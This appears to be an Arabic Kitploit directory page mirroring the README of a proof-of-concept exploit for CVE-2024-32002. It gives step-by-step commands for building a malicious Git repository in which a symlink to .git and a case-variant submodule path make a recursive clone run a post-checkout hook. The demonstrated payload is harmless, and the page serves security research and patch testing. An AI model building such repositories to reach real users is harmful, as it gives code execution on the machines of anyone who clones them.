Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2024-32002-poc-rce — إثبات المفهوم لاستغلال CVE-2024-32002، يوضح تنفيذ الأكواد عن بُعد عبر وحدات Git الفرعية الخبيثة على أنظمة الملفات غير الحساسة لحالة الأحرف. | Kitploit
أدوات/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubjakob-pennington/cve-2024-32002-poc-rce

cve-2024-32002-poc-rce

إثبات المفهوم لاستغلال CVE-2024-32002، يوضح تنفيذ الأكواد عن بُعد عبر وحدات Git الفرعية الخبيثة على أنظمة الملفات غير الحساسة لحالة الأحرف.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
13منذ 2 سنواتلم تتم المراجعة بعد

CVE-2024-32002 POC لتنفيذ الأوامر عن بعد (RCE)

POC لـ CVE-2024-32002 يوضح تنفيذ الأوامر عن بعد (RCE).

انظر cve-2024-32002-poc-rce لمستودع الوحدة الفرعية المرتبطة.

ما يحتويه هذا المستودع

  • رابط رمزي (symlink) باسم عشوائي يشير إلى مجلد .git.
  • ملف .gitmodules يعرّف الوحدة الفرعية الضارة.

كيفية إعادة إنشاء هذا المستودع

تم إنشاء هذا المستودع في لينكس (WSL2 تحديدًا). هذا مهم، لا يمكن إنشاء المستودع الضار إلا على نظام ملفات حساس لحالة الأحرف.

  1. إنشاء رابط رمزي باستخدام أحرف صغيرة فقط
root@kitploit:~
ln -s .git submodule

ملاحظات:

  • يجب أن يشير الرابط الرمزي إلى مجلد .git، لأن هذا هو المكان الذي نريد كتابة الملفات فيه.
  • اسم الرابط الرمزي (submodule) عشوائي، لكن يجب أن يبدأ بحرف صغير.
  • هذا مهم لأن الأحرف الصغيرة تُرتَّب قبل الأحرف الكبيرة. عندما يرتبك جهاز الاستنساخ حول مكان كتابة ملفات الوحدة الفرعية، نريده أن يختار الرابط الرمزي وليس مجلدًا عاديًا.
  1. إضافة الوحدة الفرعية الضارة، مع ملاحظة اختلاف حالة الأحرف في اسم مجلد الوحدة الفرعية
root@kitploit:~
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

ملاحظات:

  • اسم الوحدة الفرعية ("rce/notexists") مهم، سيدخل حيز التنفيذ عند وضع خطافنا (hook) في الوحدة الفرعية.
    • يجب أن يطابق "rce" المقطع الأخير من مسار الوحدة الفرعية.
    • يجب أن يطابق "notexists" اسم المجلد الذي يحتوي على hooks/post-checkout في مجلد الوحدة الفرعية. انظر cve-2024-32002-poc-rce.
  • بنية مسار الوحدة الفرعية ("Submodule/modules/rce") مهمة أيضًا:
    • يجب أن يطابق المقطع الأول من مسار الوحدة الفرعية ("Submodule") اسم الرابط الرمزي أعلاه، مع اختلاف حالة الأحرف فقط.
    • المقطع الثاني ("modules") يطابق اسم المسار داخل مجلد .git الذي يتتبع حالة git للوحدات الفرعية.
    • المقطع الثالث ("rce") يجب أن يطابق المقطع الأول من اسم الوحدة الفرعية أعلاه.

كيفية تشغيل POC

تؤثر هذه الثغرة فقط على ويندوز وماك أو إس لأنهما يمتلكان أنظمة ملفات غير حساسة لحالة الأحرف.

  1. تحقق مما إذا كان لديك إصدار ضعيف من git. انظر إشعار GitHub للإصدارات المتأثرة.
root@kitploit:~
git --version
  1. فكر فيما إذا كنت تريد عن علم تشغيل أمر يمكن أن يحقق RCE... هذا المستودع غير ضار، لكن هل أنت متأكد؟
  2. قم بتشغيل الأمر التالي:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  1. إذا نجح POC، يجب أن تكون قادرًا على القيام ببعض الحسابات!
تنزيل الأداة